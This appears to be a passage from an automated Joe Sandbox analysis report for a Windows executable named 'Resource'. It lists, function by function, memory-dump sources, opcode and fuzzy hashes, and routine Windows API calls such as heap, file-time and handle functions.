                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                                                              • Opcode ID: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
                                                                                                                                                                                                                                                              • Instruction ID: 1305a46d423ab1239b65cd402e56e24c9116d7eb299f0b9fd6e982761f5bbbd1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F112723728BA181DA508B25B6042697361FB44BF4F544331EEBD8B7E9CF7ED0518709
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60B7F39), ref: 00007FF6E60B80DF
                                                                                                                                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60B7F39), ref: 00007FF6E60B80F5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1707611234-0
                                                                                                                                                                                                                                                              • Opcode ID: 6407c983105320eb51bd989624a62bc8d87a63a3f1faf402972498077c5d17e8
                                                                                                                                                                                                                                                              • Instruction ID: cd6c524e149e7242fc927e9e091aca6c1f2ea610ef4ed5e010a86a31c0a00f50
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6407c983105320eb51bd989624a62bc8d87a63a3f1faf402972498077c5d17e8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D018E3352C26282E7508F14A50137EB7A0FB81BB1F604235E6A9855E8DF3FD040CB09
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF6E60C3392,?,?,?,00007FF6E60C33CF,?,?,00000000,00007FF6E60C3895,?,?,00000000,00007FF6E60C37C7), ref: 00007FF6E60BAF22
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6E60C3392,?,?,?,00007FF6E60C33CF,?,?,00000000,00007FF6E60C3895,?,?,00000000,00007FF6E60C37C7), ref: 00007FF6E60BAF2C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                                                              • Opcode ID: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
                                                                                                                                                                                                                                                              • Instruction ID: 128c4cffc1046c8998cfb36baadddb5fced5b5ee58b91d693a736bc4a2361c6f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4E08652F2932342FF056BF1564937511509F88B01F4084B4C80EC6357DF2F6885431A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 377330604-0
                                                                                                                                                                                                                                                              • Opcode ID: 77acb875fdee33a12be4fb2ce6bc4fe447f240992313a5771dda9a679e1972f9
                                                                                                                                                                                                                                                              • Instruction ID: 7f555e09f670ad173906c611165935761754701390e534a312cdaf64ca2e10ff
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77acb875fdee33a12be4fb2ce6bc4fe447f240992313a5771dda9a679e1972f9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47D01212F3D62381E65527711E9537D15906F48736F604670C03FC42E5EF2FA895523B
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2018770650-0
                                                                                                                                                                                                                                                              • Opcode ID: 4ec91da2963a3bb04052aa88cca811f321d2e1bc87a8cb66c404f3cefda0a691
                                                                                                                                                                                                                                                              • Instruction ID: 4cc636dc6d7c7a1cccc57d2e8a1c1a2d1e8df5b4563a20ff5d922086f5bba589
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ec91da2963a3bb04052aa88cca811f321d2e1bc87a8cb66c404f3cefda0a691
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33D0C912E3962381E6542BB60A4523913946F44736F604630C02AC11F5DF6FA455092B
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,?,00007FF6E60BAF99,?,?,00000000,00007FF6E60BB04E), ref: 00007FF6E60BB18A
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6E60BAF99,?,?,00000000,00007FF6E60BB04E), ref: 00007FF6E60BB194
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                                                              • Opcode ID: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
                                                                                                                                                                                                                                                              • Instruction ID: b02cc102d01a96ce3c227b2891bf25ea160a039cafd140db53bd778f21d85359
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C21F623F386A242FE609B6496543792381AF847E0F488635DA1EC73D9CF6FE445830B
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E60A2ABB), ref: 00007FF6E60A8B1A
                                                                                                                                                                                                                                                              • _findclose.LIBCMT ref: 00007FF6E60A7F99
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide_findclose
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2772937645-0
                                                                                                                                                                                                                                                              • Opcode ID: 6a56ecc169b874fe1e233505f6f9a5acf1cae56fd8a9bc6900038e6ac80cd412
                                                                                                                                                                                                                                                              • Instruction ID: e7a322a3c5f54267dbf1ab6e13a66ebc716d528e21771c09c25f4ae64b9ffe94
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a56ecc169b874fe1e233505f6f9a5acf1cae56fd8a9bc6900038e6ac80cd412
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3371AF53E28AC581E611CB2CC6053FD6360F7A9B8CF54E325DB9C52592EF2AE2C9C704
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                                              • Opcode ID: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
                                                                                                                                                                                                                                                              • Instruction ID: 771e6b53cd392b9482b7e95f7323916c341784b4c1216267503dc3f89c60d001
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF41F73392826187EA64DB19E74037973A0EB55740F104131D69EC3699CF7FE542CB5A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                                                              • Opcode ID: 91536ea0e9ff7e78fb352db3075123ca00dbd7008e392a7af2ef7617843ed8a4
                                                                                                                                                                                                                                                              • Instruction ID: 2249e383f985ac510b221f1dd2298f1427cf74c23f652b1291ae2982ae5ef4fd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91536ea0e9ff7e78fb352db3075123ca00dbd7008e392a7af2ef7617843ed8a4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC21D633B2827245FB10DA1266043FAA651BF45BE4F8C5430EE9D87786CE3FE505C20A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                                              • Opcode ID: 33c1c355f770a45dc32ec47b5556db51f5a056321d098f55ce731dda09118c74
                                                                                                                                                                                                                                                              • Instruction ID: d61071c01b0b41ac759b6fafb6a29b39475bd9798fd66426672d1fe74a9aa964
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33c1c355f770a45dc32ec47b5556db51f5a056321d098f55ce731dda09118c74
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A431CF23A3863282F741AF518A0037C2650EF80BA5F418536EA1D873D7CF7FE4528B1A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                                                              • Opcode ID: faec72fd928e516d4d760f4a89c99e996b8e0a7f11e884b20412009018256aa7
                                                                                                                                                                                                                                                              • Instruction ID: e3366429c0f1f3b90e81b16809dcd40a9f93d0d606295886a959619d00c34874
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: faec72fd928e516d4d760f4a89c99e996b8e0a7f11e884b20412009018256aa7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12218E32E247568AEB248F64C4443EC33A4FB05728F548639E71D86ADDDF3AD984CB45
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                                              • Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                                                                                                                                                                                                              • Instruction ID: 8ce4167fa5717f0569b745bd5ffefb5edbbb9c01c8f2ee68d764c3bc477f5b2d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17119623E3CA6181EA619F11961137EA260FF85B84F048431EB4DD7B8ADF7FD440870A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                                              • Opcode ID: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
                                                                                                                                                                                                                                                              • Instruction ID: 39a2ec71ec57ee6a7575a7c26ea6f03ab38385a765142ef60c7f81ab0e44b88f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE219533A38A5186DB718F18E68037977A0FB84B54F244634EA5E8B6D9DF3FD4018B15
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                                              • Opcode ID: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                                                                                                                                                                                                                              • Instruction ID: 39da6f089029c3ba16895b59ac063af7d1c2ad0565f9a8039dca51c4051cb0f2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E01C422A2876140EA15DF569A0036EA695FF95FE0F08C630DE6D97BDECE3FD5018309
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3215553584-0
